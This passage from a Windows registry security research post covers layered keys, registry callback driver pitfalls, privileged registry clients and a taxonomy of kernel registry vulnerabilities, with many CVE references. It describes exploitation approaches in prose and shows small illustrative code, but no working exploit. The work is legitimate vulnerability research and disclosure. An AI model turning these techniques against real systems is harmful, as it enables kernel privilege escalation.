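// An entry at some layer can be a regular key, a tombstone (the key was
// deleted at that layer), or absent (fall through to the next layer down).
typedef enum { LAYER_ABSENT, LAYER_KEY, LAYER_TOMBSTONE } LAYER_STATE;

// Returns 1 if the key logically exists: the first non-absent layer,
// scanning from the top of the stack, decides the outcome.
static int KeyLogicallyExists(const LAYER_STATE *Stack, size_t LayerCount) {
  for (size_t i = 0; i < LayerCount; i++) {
    if (Stack[i] == LAYER_KEY) return 1;        // Key present at this layer.
    if (Stack[i] == LAYER_TOMBSTONE) return 0;  // Deleted; masks lower layers.
  }
  return 0;  // Absent in every layer.
}
```

This is why a key without its own key node may still logically exist (a lower layer supplies it), and a key with a key node may logically not exist (the node is a tombstone).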

    Overall, the layered keys mechanism is so complex that it could warrant an entire blog post (or several) on its own, so I won't be able to explain all of its aspects here. Nevertheless, its existence will quickly become clear to anyone who starts reversing the registry implementation. The code related to this functionality can be identified in many ways, for example:

    • By references to functions that initialize the key node stack / KCB stack objects (i.e., CmpInitializeKeyNodeStack, CmpStartKcbStack, and CmpStartKcbStackForTopLayerKcb),
    • By dedicated functions that implement a given operation specifically on layered keys that end with "LayeredKey" (e.g., CmDeleteLayeredKey, CmEnumerateValueFromLayeredKey, CmQueryLayeredKey),
    • By references to the KCB.LayerHeight field, which is very often used to determine whether the code is dealing with a layered key (height greater than zero) or a base key (height equal to zero).

    I encourage those interested in further exploring this topic to read Microsoft's Containerized Configuration patent (US20170279678A1), the "Registry virtualization" section in Chapter 10 of Windows Internals (Part 2, 7th Edition), as well as my previous blog post #6, where I briefly described many internal structures related to layered keys. All of these references are great resources that can provide a good starting point for further analysis.

    When it comes to layered keys in the context of attack entry points, it's important to note that loading custom differencing hives in Windows is not straightforward. As I wrote in blog post #4, loading this type of hive is not possible at all through any standard NtLoadKey-family syscall. Instead, it is done by sending an undocumented IOCTL 0x220008 to \Device\VRegDriver, which then passes this request on to an internal kernel function named CmLoadDifferencingKey. Therefore, the first obstacle is that in order to use this IOCTL interface, one would have to reverse engineer the layout of its corresponding input structure. Fortunately, I have already done it and published it in the blog post under the VRP_LOAD_DIFFERENCING_HIVE_INPUT name. However, a second, much more pressing problem is that communicating with the VRegDriver requires administrative rights, so it can only be used for testing purposes, but not in practical privilege escalation attacks.

    So, what options are we left with? Firstly, there are potential scenarios where the exploit is packaged in a mechanism that legitimately uses differencing hives, e.g., an MSIX-packaged application running in an app silo, or a specially crafted Docker container running in a server silo. In such cases, we provide our own hives by design, which are then loaded on the victim’s system on our behalf when the malicious program or container is started. The second option is to simply ignore the inability to load our own hive and use one already present in the system. In a default Windows installation, many built-in applications use differencing hives, and the \Registry\WC key can be easily enumerated and opened without any problems (unlike \Registry\A). Therefore, if we launch a program running inside an app silo (e.g., Notepad) as a local user, we can then operate on the differencing hives loaded by it. This is exactly what I did in most of my proof-of-concept exploits related to this functionality. Of course, it is possible that a given bug will require full binary control over the differencing hive in order to trigger it, but this is a relatively rare case: of the 10 vulnerabilities I identified in this code, only two of them required such a high degree of control over the hive.

    Alternative registry attack targets

    The most crucial attack surface associated with the registry is obviously its implementation within the Windows kernel. However, other types of software interact with the registry in many ways and can be also prone to privilege escalation attacks through this mechanism. They are discussed in the following sections.

    Drivers implementing registry callbacks

    Another area where potential registry-related security vulnerabilities can be found is Registry Callbacks. This mechanism, first introduced in Windows XP and still present today, provides an interface for kernel drivers to log or interfere with registry operations in real-time. One of the most obvious uses for this functionality is antivirus software, which relies on registry monitoring. Microsoft, aware of this need but wanting to avoid direct syscall hooking by drivers, was compelled to provide developers with an official, documented API for this purpose.

    From a technical standpoint, callbacks can be registered using either the CmRegisterCallback function or its more modern version, CmRegisterCallbackEx. The documentation for these functions serves as a good starting point for exploring the mechanism, as it seamlessly leads to the documentation of the callback function itself, and from there to the documentation of all the structures that describe the individual operations. Generally speaking, callbacks can monitor virtually any type of registry operation, both before ("pre" callbacks) and after ("post" callbacks) it is performed. They can be used to inspect what is happening in the system and log the details of specific events of interest. Callbacks can also influence the outcome of an operation. In "pre" notifications, they can modify input data or completely take control of the operation and return arbitrary information to the caller while bypassing the standard operation logic. During "post" notification handling, it is possible to influence both the status returned to the user and the output data. Overall, depending on the amount and types of operations supported in a callback, a completely error-free implementation can be really difficult to write. It requires excellent knowledge of the inner workings of the registry, as well as a very thorough reading of the documentation related to callbacks. The contracts that exist between the Windows kernel and the callback code can be very complicated, so in addition to the sources mentioned above, it's also worth reading the entire separate series of seven articles detailing various callback considerations, titled Filtering Registry Calls.

    Here are some examples of things that can go wrong in the implementation of callbacks:

    • Standard user-mode memory access bugs. As per the documentation (refer to the table at the bottom of the Remarks section), pointers to output data received in "post" type callbacks contain the original user-mode addresses passed to the syscall by the caller. This means that if the callback wants to reference this data in any way, the only guarantee it has is that these pointers have been previously probed. However, it is still important to access this memory within a try/except block and to avoid potential double-fetch vulnerabilities by always copying the data to a kernel-mode buffer first before operating on it.
    • A somewhat related but higher-level issue is excessive trust in the output data structure within "post" callbacks. The problem is that some registry syscalls return data in a strictly structured way, and since the "post" callback executes before returning to user mode, it might seem safe to trust that the output data conforms to its documented format (if one wants to use or slightly modify it). An example of such a syscall is NtQueryKey, which returns a specific structure for each of the several possible information classes. In theory, it would appear that a malicious program has not yet had the opportunity to modify this data, and it should still be valid when the callback executes. In practice, however, this is not the case, because the output data has already been copied to user-mode, and there may be a parallel user thread modifying it concurrently. Therefore, it is very important that if one wants to use the output data in the "post" callback, they must first fully sanitize it, assuming that it may be completely arbitrary and is as untrusted as any other input data.
    • Moving up another level, it's important to prevent confused deputy problems that exploit the fact that callback code runs with kernel privileges. For example, if a callback wanted to redirect access to certain registry paths to another location, and it used the ZwCreateKey call without the OBJ_FORCE_ACCESS_CHECK flag to do so, it would allow an attacker to create keys in locations where they normally wouldn't have access.
    • Bugs in the emulation of certain operations in "pre"-type callbacks. If a callback decides to handle a given request on its own and signal this to the kernel by returning the STATUS_CALLBACK_BYPASS code, it is responsible for filling all important fields in the corresponding REG_XXX_KEY_INFORMATION structure so that, in accordance with the expected syscall behavior, the output data is correctly returned to the caller (source: "When a registry filtering driver's RegistryCallback routine receives a pre-notification [...]" and "Alternatively, if the driver changes a status code from failure to success, it might have to provide appropriate output parameters.").
    • Bugs in "post"-type callbacks that change an operation's status from success to failure. If we want to block an operation after it has already been executed, we must remember that it has already occurred, with all its consequences and side effects. To successfully pretend that it did not succeed, we would have to reverse all its visible effects for the user and release the resources allocated for this purpose. For some operations, this is very difficult or practically impossible to do cleanly, so I would personally recommend only blocking operations at the "pre" stage and refraining from trying to influence their outcome at the "post" stage (source: "If the driver changes a status code from success to failure, it might have to deallocate objects that the configuration manager allocated.").
    • Challenges presented by error handling within "post"-type callbacks. As per the documentation, the kernel only differentiates between a STATUS_CALLBACK_BYPASS return value and all others, which means that it doesn't really discern callback success or failure. This is somewhat logical since, at this stage, there isn't a good way to handle failures – the operation has already been performed. On the other hand, it may be highly unintuitive, as the Windows kernel idiom "if (!NT_SUCCESS(Status)) { return Status; }" becomes ineffective here. If an error is returned, it won't propagate to user mode, and will only cause premature callback exit, potentially leaving some important operations unfinished. To address this, you should design "post" callbacks to be inherently fail-safe (e.g., include no dynamic allocations), or if this isn't feasible, implement error handling cautiously, ensuring that minor operation failures don't compromise the callback's overall logical/security guarantees.
    • Issues surrounding the use of a key object pointer passed to the callback, in one of a few specific scenarios where it can have a non-NULL value but not point to a valid key object. This topic is explored in a short article in Microsoft Learn: Invalid Key Object Pointers in Registry Notifications.
    • Issues in open/create operation callbacks due to missing or incorrect handling of symbolic links and other redirections, which are characterized by the return values STATUS_REPARSE and STATUS_REPARSE_GLOBAL.
    • Bugs that result from a lack of transaction support where it is needed. This could be an incorrect assumption that every operation performed on the registry is non-transactional and its effect is visible immediately, and not only after the transaction is committed. The API function that is used to retrieve the transaction associated with a given key (if it exists) during callback execution is CmGetBoundTransaction.
    • Issues arising from using the older API version, CmCallbackGetKeyObjectID, instead of the newer CmCallbackGetKeyObjectIDEx. The older version has some inherent problems discussed in the documentation, such as returning an outdated key path if the key name has been changed by an NtRenameKey operation.
    • Issues stemming from an overreliance on the CmCallbackGetKeyObjectID(Ex) function to retrieve a key's full path. A local user can cause these functions to deterministically fail by creating and operating on a key with a path length exceeding 65535 bytes (the maximum length of a string represented by the UNICODE_STRING structure). This can be achieved using the key renaming trick described in CVE-2022-37990, and results in the CmCallbackGetKeyObjectID(Ex) function returning the STATUS_INSUFFICIENT_RESOURCES error code. This is problematic because the documentation for this function does not mention this error code, and there is no way to defend against it from the callback's perspective. The only options are to avoid relying on retrieving the full key path altogether, or to implement a defensive fallback plan if this operation fails.
    • Logical bugs arising from attempts to block access to certain registry keys by path, but neglecting the key rename operation, which can change the key's name dynamically and bypass potential filtering logic in the handling of the open/create operations. Notably, it's difficult to blame developers for such mistakes, as even the official documentation discourages handling NtRenameKey operations, citing its high complexity (quote: "Several registry system calls are not documented because they are rarely used [...]").
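The first two bullet points above boil down to one rule: fetch shared data exactly once into a private buffer, then validate and use only that copy. A minimal portable sketch of that pattern follows; the structure and function names are hypothetical, and a real driver would additionally wrap the copy in a __try/__except block after probing, which is omitted here for portability:

```c
#include <assert.h>
#include <string.h>

// Hypothetical sketch of double-fetch-safe handling of output data in a
// "post" callback. The shared buffer may be modified concurrently by a user
// thread, so it is copied ONCE into a private buffer, and all validation and
// use happen on the copy. (A real driver would also guard the copy with
// __try/__except; omitted here for portability.)
typedef struct {
  unsigned int NameLength;   // Claimed length of Name[] in bytes.
  char Name[64];
} SHARED_KEY_INFO;

static int CaptureKeyInfo(const volatile SHARED_KEY_INFO *UserBuffer,
                          SHARED_KEY_INFO *Captured) {
  // Single fetch of the whole structure into private memory.
  memcpy(Captured, (const void *)UserBuffer, sizeof(*Captured));
  // Validate the captured copy only; the shared buffer may already have
  // changed underneath, but that can no longer affect us.
  if (Captured->NameLength > sizeof(Captured->Name)) {
    return 0;  // Reject inconsistent data instead of trusting it.
  }
  return 1;
}
```

Re-reading `UserBuffer->NameLength` after validation would reintroduce the double-fetch window, which is exactly the bug class described above.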

    As we can see, developers using these types of callbacks can fall into many traps, and the probability of introducing a bug increases with the complexity of the callback's logic.

    As a security researcher, there are two approaches to enumerating this attack surface to find vulnerable callbacks: static and dynamic. The static approach involves searching the file system (especially C:\Windows\system32\drivers) for the "CmRegisterCallback" string, as every driver that registers a callback must refer to this function or its "Ex" equivalent. As for the dynamic approach, the descriptors of all callbacks in the system are linked together in a doubly-linked list that begins in the global nt!CallbackListHead object. Although the structure of these descriptors is undocumented, my analysis indicates that the pointer to the callback function is located at offset 0x28 in Windows 11. Therefore, all callbacks registered in the system at a given moment can be listed using the following WinDbg command:

    0: kd> !list -x "dqs @$extret+0x28 L1" CallbackListHead
    fffff801`c42f6cd8  fffff801`c42f6cd0 nt!CmpPreloadedHivesList
    ffffdc88`d377e418  fffff801`56a48df0 WdFilter!MpRegCallback
    ffffdc88`d8610b38  fffff801`59747410 applockerfltr!SmpRegistryCallback
    ffffdc88`d363e118  fffff801`57a05dd0 UCPD+0x5dd0
    ffffdc88`ed11d788  fffff801`c3c2ba50 nt!VrpRegistryCallback
    ffffdc88`d860c758  fffff801`597510c0 bfs!BfsRegistryCallback


    As shown, even on a clean Windows 11 system, the operating system and its drivers register a substantial number of callbacks. In the listing above, the first line of output can be ignored, as it refers to the nt!CallbackListHead object, which is the beginning of the list and not a real callback descriptor. The remaining functions are associated with the following modules:

    • WdFilter!MpRegCallback: a callback registered by Windows Defender, the default antivirus engine running on Windows.
    • applockerfltr!SmpRegistryCallback: a callback registered by the Smartlocker Filter Driver, which is one of the drivers that implement the AppLocker/SmartLocker functionality at the kernel level.
    • UCPD+0x5dd0: a callback associated with the UCPD.sys driver, which expands to "User Choice Protection Driver". This is a module that prevents third-party software from modifying the default application settings for certain file types and protocols, such as web browsers and PDF readers. As we can infer from the format of this symbol and its unresolved name, Microsoft does not currently provide PDB debug symbols for the executable image, but some information online indicates that such symbols were once available for older builds of the driver.
    • nt!VrpRegistryCallback: a callback implemented by the VRegDriver, which is part of the core Windows kernel executable image, ntoskrnl.exe. It plays a crucial role in the system, as it is responsible for redirecting key references to their counterparts within differencing hives for containerized processes. It is likely the most interesting and complex callback registered by default in Windows.
    • bfs!BfsRegistryCallback: a callback registered by the Brokering File System driver. That driver is primarily responsible for supporting secure file access for applications running in an isolated environment (AppContainers), but it also has a relatively simple registry callback that supports key opening/creation operations. It is not entirely clear why this functionality wasn't simply incorporated into VrpRegistryCallback, which serves a very similar purpose.

    In my research, I primarily focused on reviewing the callback invocations in individual registry operations (specifically calls to the CmpCallCallBacksEx function), and on the correctness of the VrpRegistryCallback function implementation. As a result, I discovered CVE-2023-38141 in the former area, and three further bugs in the VRegDriver (CVE-2023-38140, CVE-2023-36803 and CVE-2023-36576). These reports serve as a very good example of the many types of problems that can occur in registry callbacks.

    Privileged registry clients: programs and drivers

    The final attack targets related to the registry are the highly privileged users of this interface, that is, user-mode processes running with administrator/system rights, and kernel drivers that operate on the registry. The registry is a shared resource by design, and apart from app hives mounted in the special \Registry\A key, every program in the system can refer to any active key as long as it has the appropriate permissions. For a malicious user, this means two things: first, they can try to exploit weaknesses exhibited by other processes when interacting with the registry, and second, they can try to actively interfere with those processes. I can personally imagine two main types of issues related to incorrect use of the registry, and both of them are quite high-level in nature.

    The first concern is related to the fact that the registry, as a part of the NT Object Manager model, undergoes standard access control through security access checks. Each registry key is mandatorily assigned a specific security descriptor. Therefore, as the name implies, it is crucial for system security that each key's descriptor has the minimum permissions required for proper functionality, while aligning with the author's intended security model for the application.

    From a technical perspective, a specific security descriptor for a given key can be set either during its creation through the lpSecurityAttributes argument of RegCreateKeyExW, or separately by calling the RegSetKeySecurity API. If no descriptor is explicitly set, the key assumes a default descriptor based largely on the security settings of its parent key. This model makes sense from a practical standpoint. It allows most applications to avoid dealing with the complexities of custom security descriptors, while still maintaining a reasonable level of security, as high-level keys in Windows typically have well-configured security settings. Consider the well-known HKLM\Software tree, where Win32 applications have stored their global settings for many years. The assumption is that ordinary users have read access to the global configuration within that tree, but only administrators can write to it. If an installer or application creates a new subkey under HKLM\Software without explicitly setting a descriptor, it inherits the default security properties, which is sufficient in most cases.

    However, certain situations require extra care to properly secure registry keys. For example, if an application stores highly sensitive data (e.g., user passwords) in the registry, it is important to ensure that both read and write permissions are restricted to the smallest possible group of users (e.g., administrators only). Additionally, when assigning custom security descriptors to keys in global system hives, you should exercise caution to avoid inadvertently granting write permissions to all system users. Furthermore, if a user has KEY_CREATE_LINK access to a global key used by higher-privileged processes, they can create a symbolic link within it, potentially resulting in a "confused deputy" problem and the ability to create registry keys under any path. In summary, for developers creating high-privilege code on Windows and utilizing the registry, it is essential to carefully handle the security descriptors of the keys they create and operate on. From a security researcher's perspective, it could be useful to develop tooling to list all keys that allow specific access types to particular groups in the system and run it periodically on different Windows versions and configurations. This approach can lead to some very easy bug discoveries, as it doesn't require any time spent on reverse engineering or code auditing.

    The second type of issue is more subtle and arises because a single "configuration unit" in the registry sometimes consists of multiple elements (keys, values) and must be modified atomically to prevent an inconsistent state and potential vulnerabilities. For such cases, the registry supports transactions. If a given process manages a configuration that is critical to system security and in which different elements must always be consistent with each other, then making use of the Transacted Registry (TxR) is practically mandatory. A significantly worse, though somewhat acceptable, solution may be to implement custom rollback logic, i.e., in the event of a failure of some individual operation, manually reversing the changes that have been applied so far. The worst-case scenario is when a privileged program does not realize the seriousness of introducing partial changes to the registry, and implements its logic in a typical best-effort manner: calling Win32 functions as long as they succeed, and when any of them returns an error, simply passing it up to the caller without any additional cleanup.

    Let's consider this bug class on the example of a hypothetical service that, through some local inter-process communication interface, allows users to register applications for startup. It creates a key structure under the HKLM\Software\CustomAutostart\<Application Name> path, and for each such key it stores two values: the command line to run during system startup ("CommandLine"), and the username with whose privileges to run it ("UserName"). If the username value does not exist, it implicitly assumes that the program should start with system rights. Of course, the example service intends to be secure, so it only allows setting the username to the one corresponding to the security token of the requesting process. Operations on the registry take place in the following order:

    1. Create a new key named HKLM\Software\CustomAutostart\<Application Name>,
    2. Set the "CommandLine" value to the string provided by the client,
    3. Set the "UserName" value to the string provided by the client.

    The issue with this logic is that it's not transactional – if an error occurs, the execution simply aborts, leaving the partial state behind. For example, if operation #3 fails for any reason, an entry will be added to the autostart indicating that a controlled path should be launched with system rights. This directly leads to privilege escalation and was certainly not the developer's intention. One might wonder why any of these operations would fail, especially in a way controlled by an attacker. The answer is simple and was explained in the "Susceptibility to mishandling OOM conditions" section. A local attacker has at least two ways of influencing the success or failure of registry operations in the system: by filling the space of the hive they want to attack (if they have write access to at least one of its keys) or by occupying the global registry quota in memory, represented by the global nt!CmpGlobalQuota variable. Unfortunately, finding such vulnerabilities is more complicated than simply scanning the entire registry for overly permissive security descriptors. It requires identifying candidates of registry operations in the system that have appropriate characteristics (high privilege process, lack of transactionality, sensitivity to a partial/incomplete state), and then potentially reverse-engineering the specific software to get a deeper understanding of how it interacts with the registry. Tools like Process Monitor may come in handy at least in the first part of the process.

    One example of a vulnerability related to the incorrect guarantee of atomicity of system-critical structures is CVE-2024-26181. As a result of exhausting the global registry quota, it could lead to permanent damage to the HKLM\SAM hive, which stores particularly important information about users in the system, their passwords, group memberships, etc.

    Vulnerability primitives

    In this chapter, we will focus on classifying registry vulnerabilities based on the primitives they offer, and briefly discuss their practical consequences and potential exploitation methods.

    Pool memory corruption

    Pool memory corruption is probably the most common type of low-level vulnerability in the Windows kernel. In the context of the registry, this bug class is somewhat rarer than in other ring-0 components, but it certainly still occurs. It manifests in its most "pure" form when the corruption happens within an auxiliary object that is temporarily allocated on the pools to implement a specific operation. One example is a report concerning three vulnerabilities—CVE-2022-37990, CVE-2022-38038, and CVE-2022-38039—all stemming from a fairly classic 16-bit integer overflow when calculating the length of a dynamically allocated buffer. Another example is CVE-2023-38154, where the cause of the buffer overflow was slightly more intricate and originated from a lack of error handling in one of the functions responsible for recovering the hive state from LOG files.

    The second type of pool memory corruption that can occur in the registry is problems managing long-lived objects that are used to cache some information from the hive mapping in more readily accessible pool memory — such as those described in post #6. In this case, we are usually dealing with UAF-type conditions, like releasing an object while there are still some active references to it. If I had to point to one object that could be most prone to this type of bug, it would probably be the Key Control Block, which is reference counted, used by the implementation of almost every registry syscall, and for which there are some very strong invariants critical for memory safety (e.g., the existence of only one KCB for a particular key in the global KCB tree). One issue related to KCBs was CVE-2022-44683, which resulted from incorrect handling of predefined keys in the NtNotifyChangeMultipleKeys system call.

    Another, slightly different category of UAFs on pools is situations in which this type of condition is not a direct consequence of a vulnerability, but more of a side effect. Let's take security descriptors as an example: they are located in the hive space, but the kernel also maintains a cache reflecting the state of these descriptors on the kernel pools (in _CMHIVE.SecurityCache and related fields). Therefore, if for some reason a security descriptor in the hive is freed prematurely, this problem will also be automatically reflected in the cache, and some keys may start to have a dangling KCB.CachedSecurity pointer set to the released object. I have taken advantage of this fact many times in my reports to Microsoft, because it was very useful for reliably triggering crashes. While generating a bugcheck based on the UAF of the _CM_KEY_SECURITY structure in the hive is possible, it is much more convoluted than simply turning on the Special Pool mechanism and making the kernel refer to the cached copy of the security descriptor (a few examples: CVE-2023-23421, CVE-2023-35382, CVE-2023-38139). In some cases, exploiting memory corruption on pools may also offer some advantages over exploiting hive-based memory corruption, so it is definitely worth remembering this behavior for the future.

    When it comes to the strictly technical aspects of kernel pool exploitation, I won't delve into it too deeply here. I didn't specifically focus on it in my research, and there aren't many interesting registry-specific details to mention in this context. If you are interested to learn more about this topic, please refer to the resources available online.

    Hive memory corruption

    The second type of memory corruption encountered in the registry is hive-based memory corruption. This class of bugs is unique to the registry and stems from the fact that data stored in hives serves a dual role: the same bytes act both as the persistent on-disk format and as the hive's in-memory representation. The data is then operated on using C code through pointers, helper functions like memcpy, and so on. Given all this, it doesn't come as a surprise that classic vulnerabilities such as buffer overflows or use-after-free can also occur within this region.

    So far, during my research, I have managed to find 17 hive-based memory corruption issues, which constitutes approximately 32% of all 53 vulnerabilities that have been fixed by Microsoft in security bulletins. The vast majority of them were related to just two mechanisms – reference counting security descriptors and operating on subkey lists – but there were also cases of bugs related to other types of objects.

    I have started using the term "inconsistent hive state", referring to any situation where the regf format state either ceases to be internally consistent or stops accurately reflecting cached copies of the same data within other kernel objects. I described one such issue here, where the _CM_BIG_DATA.Count field stops correctly corresponding to the _CM_KEY_VALUE.DataLength field for the same registry value. However, despite this specific behavior being incorrect, according to both my analysis and Microsoft's, it doesn't have any security implications for the system. In this context, the term "hive-based memory corruption" denotes a slightly narrower group of issues that not only allow reaching any inconsistent state but specifically enable overwriting valid regf structures with attacker-controlled data.

    The general scheme for exploiting hive-based memory corruption closely resembles the typical exploitation of any other memory corruption. The attacker's initial objective is to leverage the available primitive and manipulate memory allocations/deallocations to overwrite a specific object in a controlled manner. On modern systems, achieving this stage reliably within the heap or kernel pools can be challenging due to allocator randomization and enforced consistency checks. However, the cell allocator implemented by the Windows kernel is highly favorable for the attacker: it lacks any safeguards, and its behavior is entirely deterministic, which greatly simplifies this stage of exploit development. One could even argue that, given the properties of this allocator, virtually any memory corruption primitive within the regf format can be transformed into complete control of the hive in memory with some effort.

    With this assumption, let's consider what to do next. Even if we have absolute control over all the internal data of the mapped hive, we are still limited to its mapping in memory, which in itself does not give us much. The question arises as to how we can "escape" from this memory region and use hive memory corruption to overwrite something more interesting, like an arbitrary address in kernel memory (e.g., the security token of our process).

    First of all, it is worth noting that such an escape is not always necessary – if the attack is carried out in one of the system hives (SOFTWARE, SYSTEM, etc.), we may not need to corrupt the kernel memory at all. In this case, we could simply perform a data-only attack and modify some system configuration, grant ourselves access to important system keys, etc. However, with many bugs, attacking a highly privileged hive is not possible. Then, the other option available to the attacker is to modify one of the cells to break some invariant of the regf format, and cause a second-order side effect in the form of a kernel pool corruption. Some random ideas are:

    • Setting too long a key name or inserting the illegal character '\' into the name,
    • Creating a fake exit node key,
    • Corrupting the binary structure of a security descriptor so that the internal APIs operating on them start misbehaving,
    • Crafting a tree structure within the hive with a depth greater than the maximum allowed (512 levels of nesting),
    • ... and many, many others.

    However, during experiments exploring practical exploitation, I discovered an even better method that grants an attacker the ability to perform reliable arbitrary read and write operations in kernel memory—the ultimate primitive. This method exploits the behavior of 32-bit cell index values, which exhibit unusual behavior when they exceed the hive's total size. I won't elaborate on the full technique here, but for those interested, I discussed it during my presentation at the OffensiveCon conference in May 2024. The subject of exploiting hive memory corruption will be also covered in detail in its own dedicated blog post in the future.

    Invalid cell indexes

    This is a class of bugs that manifests directly when an incorrect cell index appears in an object—either in a cell within the hive or in a structure on kernel pools, like KCB. These issues can be divided into three subgroups, depending on the degree of control an attacker can gain over the cell index.

    Cell index 0xFFFFFFFF (HCELL_NIL)

    This is a special marker that indicates that a given structure member/variable of type HCELL_INDEX doesn't point to any specific cell, which is equivalent to a NULL pointer in C. There are many situations where the value 0xFFFFFFFF (in other words, -1) is used and even desired, e.g. to signal that an optional object doesn't exist and shouldn't be processed. The kernel code is prepared for such cases and correctly checks whether a given cell index is equal to this marker before operating on it. However, problems can arise when the value ends up in a place where the kernel always expects a valid index. Any mandatory field in a specific object can be potentially subject to this problem, such as the _CM_KEY_NODE.Security field, which must always point to a valid descriptor and should never be equal to -1 (other than for exit nodes).

    Some examples of such vulnerabilities include:

    • CVE-2023-21772: an unexpected value of -1 being set in _CM_KEY_NODE.Security due to faulty logic in the registry virtualization code, which first freed the old descriptor and only then attempted to allocate a new one, which could fail, leaving the key without any assigned security descriptor.
    • CVE-2023-35357: an unexpected value of -1 being set in KCB.KeyCell, because the code assumed that it was operating on a physically existing base key, while in practice it could operate on a layered key with Merge-Unbacked semantics, which does not have its own key node, but relies solely on key nodes at lower levels of the key stack.
    • CVE-2023-35358: another case of an unexpected value of -1 being set in KCB.KeyCell, while the kernel expected that at least one key in the given key node stack would have an allocated key node object. The source of the problem here was incorrect integration of transactions and differencing hives.

    When such a problem occurs, it always manifests as the value -1 being passed as the cell index to the HvpGetCellPaged function. For decades, this function completely trusted its parameters, assuming that the input cell index would always be within the bounds of the given hive. Consequently, calling HvpGetCellPaged with a cell index of 0xFFFFFFFF would result in the execution of the following code:

    _CELL_DATA *HvpGetCellPaged(_HHIVE *Hive, HCELL_INDEX Index) {
      // With Index == 0xFFFFFFFF, the cell map walk selects the Volatile
      // storage (bit 31) and the last entries of the Directory (0x3FF)
      // and Table (0x1FF) arrays, plus the maximum block offset (0xFFF).
      _HMAP_ENTRY *Entry = &Hive->Storage[1].Map->Directory[0x3FF]->Table[0x1FF];

      return (_CELL_DATA *)((Entry->PermanentBinAddress & ~0xF) +
                            Entry->BlockOffset + 0xFFF + 4);
    }


    In other words, the function would refer to the Volatile (1) map cell, and within it, to the last element of the Directory and then the Table arrays. Considering the "small dir" optimization described in post #6, it becomes clear that this cell map walk could result in an out-of-bounds memory access within the kernel pools (beyond the boundaries of the _CMHIVE structure). Personally, I haven't tried to transform this primitive into anything more useful, but it seems evident that with some control over the kernel memory around _CMHIVE, it should theoretically be possible to get the HvpGetCellPaged function to return any address chosen by the attacker. Further exploitation prospects would largely depend on the subsequent operations that would be performed on such a fake cell, and the extent to which a local user could influence them. In summary, I've always considered these types of bugs as "exploitable on paper, but quite difficult to exploit in practice."

    Ultimately, none of this matters much, because it seems that Microsoft noticed a trend in these vulnerabilities and, in July 2023, added a special condition to the HvpGetCellFlat and HvpGetCellPaged functions:

      if (Index == HCELL_NIL) {
        KeBugCheckEx(REGISTRY_ERROR, 0x32, 1, Hive, 0xFFFFFFFF);
      }


    This basically means that the specific case of index -1 has been completely mitigated, since rather than allowing any chance of exploitation, the system now immediately shuts down with a Blue Screen of Death. As a result, the bug class no longer has any security implications. However, I do feel a bit disappointed – if Microsoft deemed the check sufficiently important to add to the code, they could have made it just a tiny bit stronger, for example:

      if ((Index & 0x7FFFFFFF) >= Hive->Storage[Index >> 31].Length) {
        KeBugCheckEx(...);
      }


    The above check would reject all cell indexes exceeding the length of the corresponding storage type, and it is exactly what the HvpReleaseCellPaged function currently does. Checking this slightly stronger condition in one fell swoop would handle invalid indexes of -1 and completely mitigate the previously mentioned technique of out-of-bounds cell indexes. While not introduced yet, I still secretly hope that it will happen one day... 🙂

    Dangling (out-of-date) cell indexes

    Another group of vulnerabilities related to cell indexes are cases where, after a cell is freed, its index remains in an active cell within the registry. Simply put, these are just the cell-specific use-after-free conditions, and so the category very closely overlaps with the previously described hive-based memory corruption.

    Notable examples of such bugs include:

    • CVE-2022-37988: Caused by the internal HvReallocateCell function potentially failing when shrinking an existing cell, which its caller assumed was impossible.
    • CVE-2023-23420: A bug in the transactional key rename operation could lead to a dangling cell index in a key's subkey list, pointing to a freed key node.
    • CVE-2024-26182: Caused by mishandling a partial success situation where an internal function might successfully perform some operations on the hive (reallocate existing subkey lists) but ultimately return an error code, causing the caller to skip updating the _CM_KEY_NODE.SubKeyLists[...] field accordingly.
    • All use-after-free vulnerabilities in security descriptors due to incorrect reference counting: CVE-2022-34707, CVE-2023-28248, CVE-2023-35356, CVE-2023-35382, CVE-2023-38139, and CVE-2024-43641.

    In general, UAF bugs within the hive are powerful primitives that can typically be exploited to achieve total control over the hive's internal data. The fact that both exploits I wrote to demonstrate practical exploitation of hive memory corruption vulnerabilities fall into this category (CVE-2022-34707, CVE-2023-23420) can serve as anecdotal evidence of this statement.

    Fully controlled/arbitrary cell indexes

    The last type of issues where cell indexes play a major role are situations in which the user somehow obtains full control over the entire 32-bit index value, which is then referenced as a valid cell by the kernel. Notably, this is not about some second-order effect of hive memory corruption, but vulnerabilities where this primitive is the root cause of the problem. Such situations happen relatively rarely, but there have been at least two such cases in the past:

    • CVE-2022-34708: missing verification of the _CM_KEY_SECURITY.Blink field in the CmpValidateHiveSecurityDescriptors function for the root security descriptor in the hive,
    • CVE-2023-35356: referencing the _CM_KEY_NODE.ValueList.List field in a predefined key, in which the ValueList structure has completely different semantics, and its List field can be set to an arbitrary value.

    Given that the correctness of cell indexes is a fairly obvious requirement known to Microsoft kernel developers, they pay close attention to verifying them thoroughly. For this reason, I think that the chance we will have many more such bugs in the future is slim. As for their exploitation, they may seem similar in nature to the way hive memory corruption can be exploited with out-of-bounds cell indexes, but in fact, these are two different scenarios. With hive-based memory corruption, we can dynamically change the value of a cell index multiple times as needed, and here, we would only have one specific 32-bit value at our disposal. If, in a hypothetical vulnerability, some interesting operations were performed on such a controlled index, I would probably still reduce the problem to the typical UAF case, try to obtain full binary control over the hive, and continue from there.

    Low-level information disclosure (memory, pointers)

    Since the registry code is written in C and operates with kernel privileges, and additionally has not yet been completely rewritten to use zeroing ExAllocatePool functions, it is natural that it may be vulnerable to memory disclosure issues when copying output data to user-mode. The most canonical example of such a bug was CVE-2023-38140, where the VrpPostEnumerateKey function (one of the sub-handlers of the VRegDriver registry callback) allocated a buffer on kernel pools with a user-controlled length, filled it with some amount of data – potentially less than the buffer size – and then copied the entire buffer back to user mode, including uninitialized bytes at the end of the allocation.

    However, besides this typical memory disclosure scenario, it is worth noting two more things in the context of the registry. One of them is that, as we know, the registry operates not only on memory but also on various files on disk, and therefore the filesystem becomes another type of data sink where data leakage can also occur. And so, for example, in CVE-2022-35768, kernel pool memory could be disclosed directly to the hive file due to an out-of-bounds read vulnerability, and in CVE-2023-28271, both uninitialized data and various kernel-mode pointers were leaked to KTM transaction log files.

    The second interesting observation is that the registry implementation does not have to be solely the source of the data leak, but can also be just a medium through which it happens. There is a certain group of keys and values that are readable by ordinary users and initialized with binary data by the kernel and drivers using ZwSetValueKey and similar functions. Therefore, there is a risk that some uninitialized data may leak through this channel, and indeed during my Bochspwn Reloaded research in 2018, I identified several instances of such leaks, such as CVE-2018-0898, CVE-2018-0899, and CVE-2018-0900.

    Broken security guarantees, API contracts and common sense assumptions

